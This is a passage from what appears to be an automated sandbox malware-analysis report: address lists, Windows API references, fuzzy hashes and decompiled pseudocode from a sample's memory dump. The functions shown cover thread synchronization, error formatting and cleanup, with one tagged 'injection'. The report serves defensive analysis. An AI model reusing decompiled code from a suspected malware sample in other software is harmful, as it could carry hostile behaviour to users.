			}

0x00404023
0x00404025
0x00404030
0x00404034
0x00404039
0x0040403b
0x00404041
0x00404045
0x0040404b
0x0040404d
0x00404053
0x00404056
0x0040405a
0x0040405d
0x00404063
0x00404067
0x00404075
0x0040439f
0x004043a2
0x004043ab
0x004043b3
0x004043b4
0x004043b5
0x004043c3
0x004043c3
0x00404081
0x00404087
0x0040408a
0x00404096
0x004040a0
0x004040a6
0x004040b2
0x004040b8
0x004040ba
0x004040c1
0x004040c7
0x004040ca
0x004040ce
0x004040df
0x004040df
0x004040e5
0x004040e8
0x00404151
0x00404153
0x0040415d
0x0040415f
0x0040415f
0x00404165
0x00404169
0x00404184
0x00404187
0x0040418e
0x00404194
0x00404196
0x00404196
0x00404198
0x00404198
0x0040419b
0x004041a2
0x004041a5
0x004041a8
0x004041a8
0x004041ac
0x004041ac
0x004041b1
0x004041b4
0x004041bc
0x004041c2
0x004041cf
0x004041d7
0x004041da
0x004041df
0x004041e5
0x004041ea
0x004041f2
0x004041f5
0x004041fa
0x00404211
0x00404220
0x00404222
0x00404231
0x00404234
0x0040423a
0x00404245
0x0040424b
0x00404256
0x00404259
0x0040425f
0x00404262
0x00404267
0x004042b4
0x004042b8
0x004042ba
0x004042bd
0x004042bf
0x004042c1
0x004042c6
0x004042cd
0x004042d1
0x004042d1
0x004042bf
0x004042de
0x004042e0
0x004042e6
0x004042e8
0x004042ed
0x004042f3
0x004042f5
0x004042f7
0x004042fc
0x004042fc
0x004042fe
0x00404309
0x0040430f
0x00404311
0x00404316
0x0040431b
0x0040431b
0x0040431b
0x00404311
0x00404325
0x00404327
0x0040432b
0x0040432d
0x00404340
0x00404353
0x00404358
0x0040435b
0x00404360
0x00404363
0x00404369
0x0040436e
0x00404371
0x00404374
0x00404374
0x00404374
0x00404379
0x00404379
0x00000000
0x00404271
0x00404280
0x00404291
0x00404295
0x0040429b
0x004042a9
0x004042ab
0x0040437c
0x0040437c
0x00404384
0x00000000
0x00000000
0x00404386
0x00404390
0x00404395
0x00404398
0x0040439b
0x00000000
0x00404390
0x00404267
0x00404200
0x00404205
0x00404208
0x0040420b
0x0040420d
0x00000000
0x00404170
0x00404170
0x00404172
0x0040417b
0x00000000
0x00000000
0x0040417d
0x00404182
0x00000000
0x00000000
0x00000000
0x00404182
0x00000000
0x00404170
0x00404169
0x004040f2
0x004040f5
0x0040410b
0x00404112
0x00404114
0x00404116
0x0040411e
0x00404139
0x00404139
0x0040413a
0x00404145
0x0040414b
0x00000000
0x00000000
0x00000000
0x00000000
0x00404120
0x00404120
0x0040412a
0x0040412e
0x0040412f
0x00404135
0x00000000
0x00404120
0x004040d0
0x004040da
0x004040dd
0x00000000
0x00000000
0x00000000
0x004040dd
0x00000000

APIs

EnterCriticalSection.KERNEL32(?,149E0ABF), ref: 0040405D
LeaveCriticalSection.KERNEL32(?), ref: 00404234
WSASetLastError.WS2_32(00000000), ref: 00404259
Sleep.KERNEL32(?,?), ref: 00404295
select.WS2_32(?,?,00000001,?,00000000), ref: 004042E0
WSAGetLastError.WS2_32 ref: 004042ED
__WSAFDIsSet.WS2_32(?,?), ref: 00404309
LeaveCriticalSection.KERNEL32(?), ref: 004043A2

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: CriticalSection$ErrorLastLeave$EnterSleepselect
String ID:
API String ID: 3820542294-0
Opcode ID: 48c1e2a17c420e62e01d742776d04caf1329104a8610379e73e39bab7a12a24a
Instruction ID: d5c9c05b919668d8b96f78d3f14c800dec68be2c73a8acd18285d52ea0b045c9
Opcode Fuzzy Hash: 48c1e2a17c420e62e01d742776d04caf1329104a8610379e73e39bab7a12a24a
Instruction Fuzzy Hash: E7C13AB1A00615EFCB18DF69C984BEAB7B5FF88310F00422AE959A7391D734AD54CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00423EFB Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 365COMMON

Download Yara Rule

APIs

_write_multi_char.LIBCMTD ref: 0042429B
_write_string.LIBCMTD ref: 004242B6
_write_multi_char.LIBCMTD ref: 004242E2

Strings

9, xrefs: 00424193

Memory Dump Source

Source File: 00000000.00000002.508381144.0000000000422000.00000020.00000001.01000000.00000003.sdmp, Offset: 00422000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_422000_xw0K5Lahxz.jbxd

Similarity

API ID: _write_multi_char$_write_string
String ID: 9
API String ID: 2640999400-2366072709
Opcode ID: 3dc82ac2c14603032fff562eec7245dfbccc14b105c738386899f85156fb0091
Instruction ID: 27ad3822f524e45dee06d09bf5032f3998a32b28923d954de04cda1cb7c0cb86
Opcode Fuzzy Hash: 3dc82ac2c14603032fff562eec7245dfbccc14b105c738386899f85156fb0091
Instruction Fuzzy Hash: 07F140B1E002299FDB24CF54DC85BAEB7B4FF85304F5441AAE609A7241D7389E84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00423A84 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 222COMMON

Download Yara Rule

APIs

_write_multi_char.LIBCMTD ref: 0042429B
_write_string.LIBCMTD ref: 004242B6
_write_multi_char.LIBCMTD ref: 004242E2

Strings

D5@, xrefs: 00423AAB

Memory Dump Source

Source File: 00000000.00000002.508381144.0000000000422000.00000020.00000001.01000000.00000003.sdmp, Offset: 00422000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_422000_xw0K5Lahxz.jbxd

Similarity

API ID: _write_multi_char$_write_string
String ID: D5@
API String ID: 2640999400-1547665192
Opcode ID: f7a8f2a5b9485d2008e151bb5fbdf85ac333ce0d27b047a828167da723e798e4
Instruction ID: 57378549e42a9c024368b292a1be0069802a2b44b944fc70cd40cd715c3bba03
Opcode Fuzzy Hash: f7a8f2a5b9485d2008e151bb5fbdf85ac333ce0d27b047a828167da723e798e4
Instruction Fuzzy Hash: C1A161B0E00228DBDB24DF55DC85BAEB3B4FB84305F5481DAE50967282D7789E84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00402410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00402410(intOrPtr* __ecx, void* __edi, signed char _a4) {
				void* _t11;
				void* _t12;
				int _t15;
				void* _t21;
				intOrPtr _t22;
				intOrPtr* _t24;
				void* _t25;

				_t21 = __edi;
				_t24 = __ecx;
				E0040C170(__ecx + 0x54);
				DeleteCriticalSection(__ecx + 0x38);
				_t11 =  *(_t24 + 0x30);
				if(_t11 != 0) {
					CloseHandle(_t11);
				}
				_push(_t21);
				_t22 =  *((intOrPtr*)(_t24 + 0x2c));
				if(_t22 != 0) {
					_t15 = CloseHandle( *(_t22 + 4));
					_push(0xc);
					E00412FD5(_t15, _t22);
					_t25 = _t25 + 8;
				}
				_t12 =  *(_t24 + 0x14);
				if(_t12 != 0) {
					_t12 = CloseHandle(_t12);
				}
				 *_t24 = 0x415740;
				if((_a4 & 0x00000001) != 0) {
					_push(0x5c);
					E00412FD5(_t12, _t24);
				}
				return _t24;
			}

0x00402410
0x00402415
0x0040241a
0x00402423
0x00402429
0x00402434
0x00402437
0x00402437
0x00402439
0x0040243a
0x0040243f
0x00402444
0x00402446
0x00402449
0x0040244e
0x0040244e
0x00402451
0x00402457
0x0040245a
0x0040245a
0x00402460
0x00402466
0x00402468
0x0040246b
0x00402470
0x00402478

APIs

DeleteCriticalSection.KERNEL32(?), ref: 00402423
CloseHandle.KERNEL32(?), ref: 00402437
CloseHandle.KERNEL32(?), ref: 00402444
CloseHandle.KERNEL32(?), ref: 0040245A

Strings

p-@, xrefs: 00402460

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: CloseHandle$CriticalDeleteSection
String ID: p-@
API String ID: 2166061224-4249266749
Opcode ID: b77f9c5a558b93229dced4b0aae2cd5d124a31a2371964d1e367237fbe8093cb
Instruction ID: 45239c00c13ad007554f8db7ff32401be1527e867b03a86cc1a709bbb7321ef6
Opcode Fuzzy Hash: b77f9c5a558b93229dced4b0aae2cd5d124a31a2371964d1e367237fbe8093cb
Instruction Fuzzy Hash: 79F02871200704EBD320AB69DD85EDBBBACAF44754B00413BF944A76C2D7B9EC0187B8

Uniqueness

Uniqueness Score: -1.00%

Function 00402130 Relevance: 7.5, APIs: 5, Instructions: 48synchronizationthreadinjectionCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00402159
CloseHandle.KERNEL32(?), ref: 00402162
TerminateThread.KERNEL32(?,00000000), ref: 0040217D
QueueUserAPC.KERNEL32(004023A0,?,00000000), ref: 00402197
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004021A2

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: Wait$CloseHandleMultipleObjectObjectsQueueSingleTerminateThreadUser
String ID:
API String ID: 3892215915-0
Opcode ID: fa38a0ed99a6fd2532b9161fedeeaac7aca7cacf5de9486a941ca5f5f5c773d6
Instruction ID: efe80d6548f03a442ccdff05186233e79b9ddd6ce730c1845ce1f14e665d07f1
Opcode Fuzzy Hash: fa38a0ed99a6fd2532b9161fedeeaac7aca7cacf5de9486a941ca5f5f5c773d6
Instruction Fuzzy Hash: F0016130600604EBC724DFA8DD05BEABBF4EF4C320F10827EE91AE62D0DB7469008B84

Uniqueness

Uniqueness Score: -1.00%

Function 00412B1A Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00412B1A(intOrPtr* _a4) {
				intOrPtr _t7;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t17;
				void* _t19;
				intOrPtr* _t20;

				EnterCriticalSection(0x41e1d0);
				_t12 =  *0x41b008; // 0x80000005
				_t13 = _t12 + 1;
				 *0x41b008 = _t13;
				 *_a4 = _t13;
				_t14 =  *0x41e218; // 0x0
				_t7 =  *0x41b008; // 0x80000005
				 *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t14 * 4)) + 4)) = _t7;
				LeaveCriticalSection(0x41e1d0);
				_t19 = _t17;
				_push(_t19);
				_t20 =  *0x41e1ec;
				if(_t20 == 0) {
					SetEvent( *0x41e1cc);
					return ResetEvent( *0x41e1cc);
				} else {
					 *0x415318(0x41e1c8);
					return  *_t20();
				}
			}

0x00412b24
0x00412b2a
0x00412b33
0x00412b34
0x00412b3b
0x00412b43
0x00412b4c
0x00412b51
0x00412b57
0x00412b5d
0x00412bb6
0x00412bb7
0x00412bbf
0x00412bd8
0x00412beb
0x00412bc1
0x00412bc8
0x00412bd1
0x00412bd1

APIs

EnterCriticalSection.KERNEL32(0041E1D0,?,?,00401329,0041E1C4,00414F30), ref: 00412B24
LeaveCriticalSection.KERNEL32(0041E1D0,?,?,00401329,0041E1C4,00414F30), ref: 00412B57
RtlWakeAllConditionVariable.NTDLL ref: 00412BCE
SetEvent.KERNEL32(?,00401329,0041E1C4,00414F30), ref: 00412BD8
ResetEvent.KERNEL32(?,00401329,0041E1C4,00414F30), ref: 00412BE4

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
String ID:
API String ID: 3916383385-0
Opcode ID: ee48a9422d572b9a5fb1aa6e31d75a6e1cff72e9d5ed82012d7f6ebefda43f33
Instruction ID: 3691bb3c85a897b25362633719a1f58aba37ba3c2ed5337bce51016b51e4ab67
Opcode Fuzzy Hash: ee48a9422d572b9a5fb1aa6e31d75a6e1cff72e9d5ed82012d7f6ebefda43f33
Instruction Fuzzy Hash: 5F01E435A05A20EBC705AF59FC489D97B65FB497A1701C07AEC0593320CB756E818BDC

Uniqueness

Uniqueness Score: -1.00%

Function 00412760 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 152
windowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00412760(void* __edx, intOrPtr* _a4, long _a8) {
				void* _v8;
				char _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				char _v44;
				char _v48;
				void* _v52;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t58;
				signed int _t59;
				long _t62;
				void _t63;
				char* _t65;
				void* _t76;
				char* _t85;
				void* _t88;
				char _t89;
				void* _t90;
				void* _t91;
				void* _t93;
				void* _t101;
				intOrPtr* _t103;
				void* _t104;
				void* _t106;
				void* _t107;
				signed int _t108;

				_t101 = __edx;
				_push(0xffffffff);
				_push(E00414E68);
				_push( *[fs:0x0]);
				_t58 =  *0x41b014; // 0x149e0abf
				_t59 = _t58 ^ _t108;
				_v20 = _t59;
				_push(_t59);
				 *[fs:0x0] =  &_v16;
				_t103 = _a4;
				_v52 = 0;
				_v48 = 0;
				_t62 = FormatMessageA(0x1300, 0, _a8, 0x400,  &_v48, 0, 0);
				_t106 = _v48;
				_v56 = _t106;
				_v8 = 0;
				if(_t62 != 0) {
					_v24 = 0xf;
					_v28 = 0;
					_v44 = 0;
					if( *_t106 != 0) {
						_t90 = _t106;
						_t18 = _t90 + 1; // 0x1
						_t101 = _t18;
						do {
							_t63 =  *_t90;
							_t90 = _t90 + 1;
						} while (_t63 != 0);
						_t91 = _t90 - _t101;
						L10:
						E00411CF0( &_v44, _t108, _t106, _t91);
						_t93 = _v28;
						_v8 = 2;
						if(_t93 == 0) {
							L16:
							 *(_t103 + 0x10) = 0;
							 *(_t103 + 0x14) = 0;
							 *(_t103 + 0x14) = 0xf;
							_v8 = 3;
							 *(_t103 + 0x10) = 0;
							if( *(_t103 + 0x14) < 0x10) {
								L22:
								_t65 = _t103;
								L23:
								 *_t65 = 0;
								E00411A00(_t103,  &_v44);
								_t68 = _v24;
								_v8 = 4;
								if(_v24 >= 0x10) {
									E00411C20(_t68 + 1, _v44, _t68 + 1, 1);
								}
								_v24 = 0xf;
								_v28 = 0;
								_v44 = 0;
								_v8 = 5;
								goto L26;
							}
							_t65 =  *_t103;
							goto L23;
						}
						do {
							_t101 = _v24;
							_t89 = _v44;
							_t75 =  >=  ? _t89 :  &_v44;
							if( *((char*)(( >=  ? _t89 :  &_v44) + _t93 - 1)) == 0xa) {
								L14:
								_t30 = _t93 - 1; // -1
								_t76 = _t30;
								if(_t93 < _t76) {
									__imp__?_Xout_of_range@std@@YAXPBD@Z("invalid string position");
									goto L22;
								}
								goto L15;
							}
							_t80 =  >=  ? _t89 :  &_v44;
							if( *((char*)(( >=  ? _t89 :  &_v44) + _t93 - 1)) != 0xd) {
								if(_t93 != 0) {
									_t82 =  >=  ? _t89 :  &_v44;
									if( *((char*)(( >=  ? _t89 :  &_v44) + _t93 - 1)) == 0x2e) {
										_t45 = _t93 - 1; // -1
										E0040FE00( &_v44);
									}
								}
								goto L16;
							}
							goto L14;
							L15:
							_v28 = _t76;
							_t78 =  >=  ? _t89 :  &_v44;
							 *((char*)(( >=  ? _t89 :  &_v44) + _t93 - 1)) = 0;
							_t93 = _v28;
						} while (_t93 != 0);
						goto L16;
					}
					_t91 = 0;
					goto L10;
				} else {
					 *(_t103 + 0x14) = 0xf;
					 *(_t103 + 0x10) = _t62;
					if( *(_t103 + 0x14) < 0x10) {
						_t85 = _t103;
					} else {
						_t85 =  *_t103;
					}
					 *_t85 = 0;
					E00411CF0(_t103, _t108, "Unknown error", 0xd);
					_v8 = 1;
					L26:
					LocalFree(_t106);
					 *[fs:0x0] = _v16;
					_pop(_t104);
					_pop(_t107);
					_pop(_t88);
					return E00412A1E(_t103, _t88, _v20 ^ _t108, _t101, _t104, _t107);
				}
			}

0x00412760
0x00412763
0x00412765
0x00412770
0x00412774
0x00412779
0x0041277b
0x00412781
0x00412785
0x0041278b
0x0041279e
0x004127ac
0x004127b3
0x004127b9
0x004127bc
0x004127bf
0x004127c8
0x004127fd
0x00412804
0x0041280b
0x00412812
0x00412818
0x0041281a
0x0041281a
0x00412820
0x00412820
0x00412822
0x00412823
0x00412827
0x00412829
0x0041282e
0x00412833
0x00412836
0x0041283c
0x00412885
0x00412885
0x0041288c
0x00412893
0x0041289e
0x004128a2
0x004128a9
0x004128dc
0x004128dc
0x004128de
0x004128de
0x004128e7
0x004128ec
0x004128ef
0x004128f6
0x004128ff
0x00412904
0x00412907
0x0041290e
0x00412915
0x00412919
0x00000000
0x00412919
0x004128ab
0x00000000
0x004128ab
0x00412840
0x00412840
0x00412846
0x0041284c
0x00412854
0x00412866
0x00412866
0x00412866
0x0041286b
0x004128d6
0x00000000
0x004128d6
0x00000000
0x0041286b
0x0041285c
0x00412864
0x004128b1
0x004128b9
0x004128c1
0x004128c3
0x004128ca
0x004128ca
0x004128c1
0x00000000
0x004128b1
0x00000000
0x0041286d
0x0041286d
0x00412876
0x00412879
0x0041287e
0x00412881
0x00000000
0x00412840
0x00412814
0x00000000
0x004127ca
0x004127ca
0x004127d1
0x004127d8
0x004127de
0x004127da
0x004127da
0x004127da
0x004127e9
0x004127ec
0x004127f1
0x00412920
0x00412921
0x0041292c
0x00412934
0x00412935
0x00412936
0x00412944
0x00412944

APIs

FormatMessageA.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000,149E0ABF), ref: 004127B3
LocalFree.KERNEL32(00000000,00000000,00000000,00000001), ref: 00412921

Strings

invalid string position, xrefs: 004128D1
Unknown error, xrefs: 004127E2

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: Unknown error$invalid string position
API String ID: 1427518018-1837348584
Opcode ID: fee7d23d86e162daaaa6c20d4af300deadac8cab9d5e3106c43b4d677e6b146d
Instruction ID: 0a2e8cf89e7aa241900c831da4f5968a3589c8b045a5dbfee49f40e0272d9a87
Opcode Fuzzy Hash: fee7d23d86e162daaaa6c20d4af300deadac8cab9d5e3106c43b4d677e6b146d
Instruction Fuzzy Hash: 2E51F470A04249EFEB14DF58CA44BEEBBB5FF48304F14412ED401A7681D3B95AD4CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D770 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E0040D770(signed int __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a12) {
				char _v8;
				void* _v12;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				char _v88;
				intOrPtr _v92;
				signed int* _v100;
				char* _v108;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t119;
				signed int _t120;
				void* _t126;
				signed int _t131;
				signed int _t132;
				char* _t134;
				signed int _t135;
				char _t137;
				signed int _t138;
				void* _t140;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				intOrPtr _t146;
				intOrPtr _t148;
				signed int _t149;
				char _t156;
				char _t158;
				signed int _t159;
				signed int _t167;
				void* _t170;
				signed int _t176;
				signed int* _t177;
				void* _t179;
				signed int* _t184;
				char* _t185;
				intOrPtr _t186;
				signed int _t187;
				void* _t189;
				signed int _t192;
				char* _t213;
				signed int _t214;
				intOrPtr* _t215;
				signed int _t216;
				void* _t218;
				void* _t220;
				char* _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				intOrPtr _t226;
				void* _t227;
				signed int _t228;
				void* _t230;
				signed int _t231;

				_t210 = __edx;
				_push(0xffffffff);
				_push(0x41456b);
				_push( *[fs:0x0]);
				_t231 = _t230 - 0x28;
				_t119 =  *0x41b014; // 0x149e0abf
				_t120 = _t119 ^ _t228;
				_v24 = _t120;
				_push(_t215);
				_push(_t120);
				 *[fs:0x0] =  &_v16;
				_t176 = __ecx;
				_v36 = __ecx;
				_v52 = __ecx;
				_v28 = _a12;
				_t220 = E00401EF0();
				_v36 = E00412970();
				_v40 = _t220;
				_t126 =  ==  ? 0 : E00401790;
				if(E00401790 != 0) {
					E00401CE0( &_v40, "mutex", _t215, _t220);
					goto L6;
				} else {
					_t226 = _a4;
					_v8 = E00401790;
					 *((intOrPtr*)(_t176 + 0x18)) = _t226;
					_t215 = E00412C3A(_t126, _t176, _t215, _t226, 0x5c);
					_v36 = _t215;
					_push(0x5c);
					_push(0);
					_push(_t215);
					L004139BD();
					 *(_t215 + 4) = 0;
					_t231 = _t231 + 0x10;
					 *(_t215 + 8) = 0;
					 *((intOrPtr*)(_t215 + 0xc)) = _t226;
					 *(_t215 + 0x10) = 0;
					 *_t215 = 0x4156d8;
					 *(_t215 + 0x14) = 0;
					 *(_t215 + 0x18) = 0;
					 *(_t215 + 0x1c) = 0;
					 *(_t215 + 0x20) = 0;
					 *(_t215 + 0x24) = 0;
					 *((intOrPtr*)(_t215 + 0x28)) = E00402B30(__edx);
					 *(_t215 + 0x2c) = 0;
					 *(_t215 + 0x30) = 0;
					_v8 = 5;
					 *(_t215 + 0x34) = 0;
					_t220 = E00401EF0();
					_v44 = E00412970();
					_v48 = _t220;
					_t167 =  ==  ? 0 : E00401790;
					if(E00401790 != 0) {
						L6:
						E00401CE0( &_v48, "mutex", _t215, _t220);
						goto L7;
					} else {
						 *((intOrPtr*)(_t215 + 0x50)) = E00401790;
						 *((intOrPtr*)(_t215 + 0x54)) = E00401790;
						 *((intOrPtr*)(_t215 + 0x58)) = E00401790;
						_v8 = 7;
						_t169 =  <  ? _v28 : _t167 | 0xffffffff;
						_t170 = CreateIoCompletionPort(0xffffffff, 0, 0,  <  ? _v28 : _t167 | 0xffffffff);
						 *(_t215 + 0x14) = _t170;
						if(_t170 != 0) {
							L4:
							 *((intOrPtr*)(_t176 + 0x1c)) = _t215;
							 *(_t215 + 4) = 0x41d0d0;
							 *(_t215 + 8) = 0;
							 *( *((intOrPtr*)(_t176 + 0x1c)) + 0x10) = 0;
							 *[fs:0x0] = _v16;
							_pop(_t218);
							_pop(_t227);
							_pop(_t179);
							return E00412A1E(_t176, _t179, _v24 ^ _t228, _t210, _t218, _t227);
						} else {
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x1c], xmm0");
							_t220 = GetLastError();
							_v32 = _t220;
							_v28 = E00412970();
							if(_t220 != 0) {
								L7:
								_t213 = "iocp";
								_t184 =  &_v32;
								E00401CE0(_t184, _t213, _t215, _t220);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t228);
								_push(0xffffffff);
								_push(0x4145b5);
								_push( *[fs:0x0]);
								_push(_t176);
								_push(_t220);
								_push(_t215);
								_t131 =  *0x41b014; // 0x149e0abf
								_t132 = _t131 ^ _t231;
								__eflags = _t132;
								_push(_t132);
								 *[fs:0x0] =  &_v88;
								_v92 = _t231 - 0x20;
								_t134 = _t213;
								_v108 = _t134;
								_t177 = _t184;
								_v100 = _t177;
								_t185 = _t134;
								_v112 = 0;
								_t221 =  &(_t185[1]);
								do {
									_t135 =  *_t185;
									_t185 =  &(_t185[1]);
									__eflags = _t135;
								} while (_t135 != 0);
								_t214 =  *_t177;
								_t186 = _t185 - _t221;
								_v28 = _t186;
								_t137 = _t177 +  *(_t214 + 4);
								_v36 = _t137;
								_t216 =  *(_t137 + 0x24);
								_t222 =  *(_t137 + 0x20);
								__eflags = _t216;
								if(__eflags < 0) {
									L17:
									asm("xorps xmm0, xmm0");
									asm("movlpd [ebp-0x2c], xmm0");
									_t216 = _v48;
									_t223 = _v52;
								} else {
									if(__eflags > 0) {
										L16:
										_t223 = _t222 - _t186;
										asm("sbb edi, 0x0");
									} else {
										__eflags = _t222;
										if(_t222 == 0) {
											goto L17;
										} else {
											__eflags = _t216;
											if(__eflags < 0) {
												goto L17;
											} else {
												if(__eflags > 0) {
													goto L16;
												} else {
													__eflags = _t222 - _t186;
													if(_t222 <= _t186) {
														goto L17;
													} else {
														goto L16;
													}
												}
											}
										}
									}
								}
								_t138 =  *(_t137 + 0x38);
								_t187 = _t214;
								_v52 = _t177;
								__eflags = _t138;
								if(_t138 != 0) {
									 *((intOrPtr*)( *_t138 + 4))();
									_t214 =  *_t177;
									_t187 = _t214;
								}
								_v12 = 0;
								_t140 = _t177 +  *(_t214 + 4);
								__eflags =  *(_t140 + 0xc);
								if( *(_t140 + 0xc) == 0) {
									_t141 =  *(_t140 + 0x3c);
									__eflags = _t141;
									if(_t141 == 0) {
										L25:
										_t142 = 1;
									} else {
										__eflags = _t141 - _t177;
										if(_t141 == _t177) {
											goto L25;
										} else {
											__imp__?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ();
											_t214 =  *_t177;
											_t187 = _t214;
											_t159 =  *(_t214 + 4);
											__eflags =  *( &(_t177[3]) + _t159);
											_t142 = _t159 & 0xffffff00 |  *( &(_t177[3]) + _t159) == 0x00000000;
										}
									}
								} else {
									_t142 = 0;
								}
								_v48 = _t142;
								_v12 = 1;
								__eflags = _t142;
								if(_t142 != 0) {
									_v12 = 2;
									_t143 =  *(_t214 + 4);
									__eflags = ( *( &(_t177[5]) + _t143) & 0x000001c0) - 0x40;
									if(( *( &(_t177[5]) + _t143) & 0x000001c0) == 0x40) {
										L37:
										_t146 =  *((intOrPtr*)(_t187 + 4));
										__imp__?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z(_v40, _v28, 0);
										__eflags = _t146 - _v28;
										if(_t146 != _v28) {
											L43:
											_t189 = 4;
										} else {
											__eflags = _t214;
											if(_t214 != 0) {
												goto L43;
											} else {
												while(1) {
													__eflags = _t216;
													if(__eflags < 0) {
														break;
													}
													if(__eflags > 0) {
														L42:
														_t156 =  *((intOrPtr*)( *((intOrPtr*)( *_t177 + 4)) +  &(_t177[0x10])));
														_v40 = _t156;
														__imp__?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z(_v40);
														__eflags = _t156 - 0xffffffff;
														if(_t156 != 0xffffffff) {
															_t223 = 0xffffffff + _t223;
															asm("adc edi, 0xffffffff");
															continue;
														} else {
															goto L43;
														}
													} else {
														__eflags = _t223;
														if(_t223 == 0) {
															break;
														} else {
															goto L42;
														}
													}
													goto L46;
												}
												_t189 = 0;
												__eflags = 0;
											}
										}
									} else {
										asm("o16 nop [eax+eax]");
										while(1) {
											__eflags = _t216;
											if(__eflags < 0) {
												break;
											}
											if(__eflags > 0) {
												L33:
												_t158 =  *((intOrPtr*)( *((intOrPtr*)( *_t177 + 4)) +  &(_t177[0x10])));
												_v36 = _t158;
												__imp__?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z(_v36);
												__eflags = _t158 - 0xffffffff;
												if(_t158 != 0xffffffff) {
													_t223 = 0xffffffff + _t223;
													asm("adc edi, 0xffffffff");
													continue;
												} else {
													_t89 = _t158 + 5; // 0x5
													_t189 = _t89;
												}
											} else {
												__eflags = _t223;
												if(_t223 == 0) {
													break;
												} else {
													goto L33;
												}
											}
											goto L46;
										}
										_t187 =  *_t177;
										goto L37;
									}
									L46:
									_t148 =  *((intOrPtr*)( *_t177 + 4));
									 *(_t148 +  &(_t177[8])) = 0;
									 *(_t148 +  &(_t177[9])) = 0;
									_v12 = 1;
								} else {
									_t189 = 4;
								}
								_t149 =  *_t177;
								__imp__?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z(_t189, 0);
								_v12 = 4;
								__imp__?uncaught_exception@std@@YA_NXZ();
								_t224 = _v52;
								__eflags = _t149;
								if(_t149 == 0) {
									__imp__?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ(); // executed
								}
								_v12 = 5;
								_t192 =  *( *((intOrPtr*)( *_t224 + 4)) + _t224 + 0x38);
								__eflags = _t192;
								if(_t192 != 0) {
									 *((intOrPtr*)( *_t192 + 8))();
								}
								 *[fs:0x0] = _v20;
								return _t177;
							} else {
								goto L4;
							}
						}
					}
				}
			}

0x0040d770
0x0040d773
0x0040d775
0x0040d780
0x0040d781
0x0040d784
0x0040d789
0x0040d78b
0x0040d790
0x0040d791
0x0040d795
0x0040d79b
0x0040d79d
0x0040d7a3
0x0040d7a6
0x0040d7ae
0x0040d7b7
0x0040d7bc
0x0040d7c4
0x0040d7c9
0x0040d90b
0x00000000
0x0040d7cf
0x0040d7cf
0x0040d7d2
0x0040d7d7
0x0040d7df
0x0040d7e4
0x0040d7e7
0x0040d7e9
0x0040d7eb
0x0040d7ec
